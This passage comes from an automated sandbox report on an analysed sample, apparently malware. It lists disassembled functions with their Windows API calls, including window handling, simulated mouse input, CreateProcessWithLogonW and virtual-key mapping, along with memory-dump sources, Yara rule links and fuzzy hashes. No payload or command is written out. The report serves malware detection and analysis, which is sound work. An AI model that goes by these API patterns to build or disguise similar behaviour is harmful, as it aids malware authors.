                                                                                                                Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1976402638-0
                                                                                                                • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871949834-0
                                                                                                                • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1640429340-0
                                                                                                                • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 752480666-0
                                                                                                                • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275902921-0
                                                                                                                • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275902921-0
                                                                                                                • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 004554DF
                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3691411573-0
                                                                                                                • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                                                • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                                                Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                • EndPath.GDI32(?), ref: 0044724E
                                                                                                                • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 372113273-0
                                                                                                                • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
